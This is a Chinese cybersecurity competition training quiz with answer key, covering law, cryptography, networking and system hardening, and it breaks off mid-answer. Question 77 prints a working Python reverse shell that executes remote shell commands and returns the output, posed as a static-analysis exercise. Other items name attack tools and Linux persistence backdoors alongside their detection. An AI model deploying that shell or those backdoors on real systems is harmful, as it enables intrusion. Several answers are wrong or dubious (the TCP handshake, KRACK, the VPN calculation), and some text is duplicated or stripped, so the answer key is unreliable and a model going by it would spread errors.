网络安全知识竞赛培训试题及答案

网络安全知识竞赛培训试题及答案一、单项选择题（每题1分，共30分。每题只有一个正确答案，请将正确选项字母填入括号内）1.2021年9月1日正式施行的《中华人民共和国数据安全法》中，对“重要数据”实行分级分类保护，其分级依据的首要因素是（）。A.数据规模 B.数据敏感程度 C.数据产生频率 D.数据存储介质答案：B2.在SSL/TLS握手阶段，用于协商对称加密密钥的算法是（）。A.RSA B.ECC C.DH/ECDHE D.MD5答案：C3.以下关于零信任架构的描述，错误的是（）。A.默认不信任任何访问主体 B.先连接后验证 C.细粒度动态授权 D.持续信任评估答案：B4.利用公开漏洞CVE-2021-44228对ApacheLog4j2组件实施远程代码执行的攻击名称是（）。A.Heartbleed B.Shellshock C.Log4Shell D.DirtyCow答案：C5.我国《网络安全法》规定，网络运营者收集个人信息应当遵循的原则是（）。A.合法、正当、必要 B.用户明示同意 C.最小够用 D.以上全部答案：D6.在Windows系统中，用于查看当前TCP连接及进程PID的命令是（）。A.ping B.tracert C.netstat-ano D.ipconfig答案：C7.以下哪项不是对称加密算法（）。A.SM4 B.AES-256 C.3DES D.ECDSA答案：D8.关于Docker容器逃逸，最常被利用的是（）。A.未限制容器CPU配额 B.挂载宿主机/var/run/docker.sock C.使用alpine镜像 D.关闭SELinux答案：B9.在等级保护2.0中，第三级系统应每年至少进行一次等级测评，测评机构必须具有（）。A.国家认监委认证资质 B.公安部三所推荐 C.省级等保办推荐 D.国家网络安全等级保护工作协调小组办公室推荐答案：D10.使用nmap扫描目标/24的存活主机，命令为（）。A.nmap-sP/24 B.nmap-sS/24 C.nmap-O/24 D.nmap-sV/24答案：A11.在Linux系统中，权限位出现“-rwsr-xr-x”时，字母s表示（）。A.粘滞位 B.强制位 C.设置SUID D.设置SGID答案：C12.关于HTTP状态码，表示“永久重定向”的是（）。A.301 B.302 C.303 D.307答案：A13.以下哪项不是社会工程学攻击的常见手段（）。A.鱼叉钓鱼 B.预文本 C.水坑攻击 D.彩虹表答案：D14.在密码学中，能够隐藏明文统计特征，使相同明文加密后产生不同密文的模式是（）。A.ECB B.CBC C.GCM D.CTR答案：C15.关于WannaCry勒索病毒，其大规模传播主要依赖的漏洞编号是（）。A.MS17-010 B.CVE-2014-0160 C.CVE-2017-0199 D.CVE-2018-8174答案：A16.在BGP安全扩展中，用于验证AS路径真实性的协议是（）。A.RPKI B.DNSSEC C.SRTP D.L2TP答案：A17.关于OAuth2.0授权码模式，第一步由用户浏览器发起的请求参数response_type应为（）。A.token B.code C.id_token D.password答案：B18.在Android应用逆向中，用于查看APK签名的工具是（）。A.apktool B.dex2jar C.keytool D.jarsigner答案：D19.关于IPv6安全，以下哪项扩展头可被用于绕过安全设备（）。A.路由头 B.目的选项头 C.分段头 D.以上全部答案：D20.在云计算责任共担模型中，IaaS服务商通常不负责（）。A.物理基础设施 B.虚拟化层 C.客户数据加密 D.可用区电力答案：C21.关于入侵检测系统（IDS），以下说法正确的是（）。A.只能检测不能阻断 B.可完全替代防火墙 C.无法检测加密流量 D.必须部署在网关答案：A22.在密码管理策略中，推荐用户密码最短长度为（）。A.6位 B.8位 C.10位 D.12位答案：D23.关于国密算法，SM2主要用于（）。A.对称加密 B.杂凑 C.数字签名与密钥交换 D.随机数生成答案：C24.在Windows日志中，安全日志的事件ID4624表示（）。A.登录失败 B.登录成功 C.账户锁定 D.权限提升答案：B25.关于网络流量取证，以下哪项技术可检测HTTPS加密流量中的恶意域名（）。A.JA3/JA3S指纹 B.流量整形 C.负载均衡 D.GRE隧道答案：A26.在Linux系统中，可用于限制用户进程数的配置文件是（）。A./etc/security/limits.conf B./etc/passwd C./etc/shadow D./etc/fstab答案：A27.关于区块链安全，51%攻击主要针对共识算法（）。A.PoW B.PoS C.DPoS D.PBFT答案：A28.在Web应用防火墙（WAF）规则中，用于匹配SQL注入关键字“unionselect”的正则写法是（）。A./union\s+select/i B./union.select/g C./union+select/m D./union.select/sA./union\s+select/i B./union.select/g C./union+select/m D./union.select/s答案：A29.关于无线安全，WPA3个人模式采用的握手协议是（）。A.WEP开放 B.WPA24次握手 C.SAE等同密钥交换 D.EAP-TLS答案：C30.在《个人信息保护法》中，处理敏感个人信息必须取得个人的（）。A.明示同意 B.书面同意 C.单独同意 D.默示同意答案：C二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，请将所有正确选项字母填入括号内，漏选、错选均不得分）31.以下哪些属于OWASPTop102021中新增的风险类别（）。A.失效的访问控制 B.加密失败 C.服务端请求伪造SSRF D.不安全的反序列化答案：C、B32.关于DNS安全扩展（DNSSEC），以下说法正确的是（）。A.使用RRSIG记录提供签名 B.使用DS记录建立信任链 C.可防止DNS缓存投毒 D.能隐藏查询内容防止窃听答案：A、B、C33.在Linux系统加固中，可有效缓解提权攻击的措施有（）。A.启用SELinux B.设置grub密码 C.限制sudo命令 D.关闭SSH服务答案：A、B、C34.以下哪些算法属于国密算法体系（）。A.SM1 B.SM3 C.SM4 D.SM9答案：A、B、C、D35.关于勒索病毒防御，正确的企业级措施包括（）。A.网络分段 B.3-2-1备份策略 C.禁用Office宏 D.关闭所有漏洞补丁更新答案：A、B、C36.在无线渗透测试中，可用来破解WPA2-PSK的工具或技术有（）。A.aircrack-ng B.hashcat C.WPSPixieDust D.KRACK攻击答案：A、B、C、D37.关于云原生安全，Kubernetes集群面临的主要攻击面包括（）。A.APIServer未授权 B.kubelet10250端口暴露 C.etcd未启用TLS D.容器镜像带恶意代码答案：A、B、C、D38.以下哪些属于《关键信息基础设施安全保护条例》中定义的关键业务（）。A.金融支付清算 B.大型医疗信息系统 C.云计算平台 D.大型电商物流系统答案：A、B、C、D39.关于日志审计，符合《网络安全法》留存要求的做法有（）。A.留存不少于6个月 B.日志防篡改 C.集中异地备份 D.仅留存成功登录日志答案：A、B、C40.在二进制漏洞缓解技术中，可防御栈溢出攻击的机制有（）。A.DEP/NX B.ASLR C.StackCanary D.CFG答案：A、B、C、D三、填空题（每空1分，共20分。请将正确答案填写在横线上）41.在TCP三次握手中，客户端发送的第二个报文段标志位为________。答案：SYN+ACK42.使用openssl生成2048位RSA私钥的命令为opensslgenrsa-outprivate.pem________。答案：204843.在Windows中，用于查看本地安全策略的命令行工具是________。答案：secpol.msc44.我国《密码法》将密码分为核心密码、普通密码和________密码三类。答案：商用45.在Linux文件权限中，八进制数值4755表示设置了________特殊位。答案：SUID46.在SQL注入中，使用________函数可获取数据库当前用户名（MySQL）。答案：user()47.在IPv6地址2001:0db8:0000:0000:0000:ff00:0042:8329中，压缩写法为________。答案：2001:db8::ff00:42:832948.在Metasploit中，用于搜索模块的命令是________。答案：search49.在PKI体系中，负责颁发并管理用户证书的实体称为________。答案：CA（证书颁发机构）50.在云计算中，提供“基础设施即服务”的英文缩写为________。答案：IaaS51.在Wireshark过滤器中，筛选HTTP状态码为404的表达式为________。答案：http.response.code==40452.在AndroidManifest.xml中，申请网络权限的标签为________。答案：<uses-permissionandroid:name="android.permission.INTERNET"/>53.在密码学中，满足“雪崩效应”指输入微小变化导致输出________变化。答案：显著（或一半以上比特）54.在等级保护2.0中，安全区域边界要求实现________防护、访问控制、入侵防范等。答案：恶意代码55.在BGP协议中，用于标识路由策略的公认强制属性是________。答案：AS_PATH56.在JWT令牌中，用于签名的字段名称是________。答案：signature57.在Linux系统中，用于强制访问控制的安全模块简称为________。答案：SELinux58.在Windows日志中，事件查看器导出日志的默认文件扩展名为________。答案：evtx59.在渗透测试中，获取目标子域名的技术称为________收集。答案：信息（或子域名）60.在《个人信息保护法》中，个人信息处理者应当定期开展________影响评估。答案：个人信息保护四、判断题（每题1分，共10分。正确打“√”，错误打“×”）61.使用HTTPS就能完全防止中间人攻击，无需证书校验。 答案：×62.在Linux中，/etc/shadow文件对所有用户可读。 答案：×63.WPA3企业模式仍支持EAP-TLS认证方式。 答案：√64.国密SM3算法输出杂凑值长度为256位。 答案：√65.在云计算中，租户对SaaS模式下的操作系统层拥有完全控制。 答案：×66.使用防火墙即可完全阻断SQL注入攻击。 答案：×67.在Windows中，关闭默认共享ADMIN$可提升安全性。 答案：√68.区块链智能合约一旦部署就不可升级。 答案：×69.在IPv6中，IPSec强制使用，因此不再需要VPN。 答案：×70.使用随机化种子可有效防止CSRF攻击。 答案：×五、简答题（共30分）71.（封闭型，6分）简述SSL/TLS握手阶段中“密钥交换”步骤的具体流程，并指出该步骤如何防止中间人攻击。答案：密钥交换发生在客户端发送ClientKeyExchange消息时。客户端使用服务器证书中的公钥加密预主密钥（PremasterSecret）后发送给服务器；服务器用私钥解密得到预主密钥。双方各自利用预主密钥、之前交换的随机数，通过约定算法生成对称会话密钥。中间人攻击者若无服务器私钥，则无法解密预主密钥，因而无法计算出相同会话密钥，从而保证密钥交换机密性与完整性。72.（开放型，6分）结合实例说明企业如何建立数据分类分级制度，并给出技术落地的三项关键措施。答案：企业首先依据《数据安全法》将数据分为核心、重要、一般三级，例如将客户身份证号、银行卡号划为重要数据，内部通知为一般数据。技术落地：1.数据发现与标识——部署DLP工具自动扫描数据库、文件服务器，按正则与机器学习打标签；2.访问控制——基于标签实施ABAC，重要数据仅允许财务角色在工作日9-18点访问；3.加密与脱敏——重要数据静态加密（SM4），测试环境使用脱敏数据，日志中身份证号掩码显示。73.（封闭型，6分）说明Kerberos协议中TGT的作用，并指出其生命周期管理的安全要点。答案：TGT（TicketGrantingTicket）是用户首次认证后由KDC颁发的票据，用于后续申请各类服务票据，避免重复输入口令。安全要点：1.设置合理有效期（默认10小时），防止长期被盗用；2.存储在内存并标记不可交换到磁盘；3.启用预认证防止暴力破解；4.对高敏账户启用短票证生命周期并强制续期验证。74.（开放型，6分）某电商平台发现用户订单接口存在“越权查看他人订单”漏洞，请给出完整的修复方案，包括技术、管理与监控层面。答案：技术：1.在订单查询API增加细粒度授权，校验session中的user_id与订单所属user_id是否一致；2.使用随机不可猜测的UUID作为订单号，防止遍历；3.引入OAuth2.0Scope限定“order:read”权限。管理：1.将接口纳入SDL，上线前做越权专项测试；2.对开发进行安全编码培训，统一使用公司封装的后台“权限SDK”。监控：1.接入RASP实时阻断越权访问；2.在SIEM设置规则：单一用户短时间内大量查询不同订单号即告警；3.每周审计订单访问日志，异常账号强制二次认证。75.（封闭型，6分）列举Linux系统下三种持久化后门技术，并给出对应检测方法。答案：1.修改/etc/crontab添加定时任务，检测：使用auditd监控crontab文件写操作；2.在/etc/ld.so.preload注入恶意so，检测：定期检查preload文件完整性，使用strace观察进程异常库调用；3.写入SSH公钥到~/.ssh/authorized_keys，检测：部署HIDS比对基线，发现新增key即告警，并启用两步验证限制SSH登录。六、应用题（共30分）76.（计算类，10分）某公司计划部署IPSecVPN，采用IKEv2主模式预共享密钥认证，DHGroup14（2048位），AES-256-GCM加密，SHA-256完整性。已知网络带宽峰值为200Mbps，平均包长800字节，VPN设备AES-256-GCM吞吐实测1.2Gbps，DH计算耗时50ms，建立每隧道协商数据量6KB。（1）计算单隧道建立阶段加密数据量占协商数据量的比例（保留两位小数）。（2）若同时在线用户数峰值为3000人，每人一条隧道，求隧道建立阶段总延迟是否满足≤3秒业务要求？（3）给出两种提升并发隧道建立性能的工程方案。答案：（1）协商数据量6KB中，实际加密载荷为IDi、AUTH、SA、TS等约4.2KB，比例=4.2/6=0.70（70.00%）。（2）DH计算为串行瓶颈，50ms/隧道，3000×50ms=150s，远大于3s，不满足。（3）方案一：部署集群化VPN控制器，使用Anycast分流，将DH计算卸载到GPU卡，降低单计算耗时至5ms；方案二：启用PSK+EAP-TLS混合模式，对后续隧道使用快速重连（IKEv2RFC5723），将新隧道建立量降至10%，300隧道×5ms=1.5s，满足。77.（分析类，10分）给出一段疑似恶意Python脚本片段，请静态分析并回答：```pythonimportbase64,socket,subprocesss=socket.socket();s.connect(("8",4444))while1:d=s.recv(1024)iflen(d)==0:breakp=subprocess.Popen(d,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)o=p.stdout.read()+p.stderr.read()s.send(base64.b64encode(o))```（1）指出该脚本的主要恶意功能。（2）给出三条网络侧检测特征。（3）给出三条主机侧防御措施。答案：（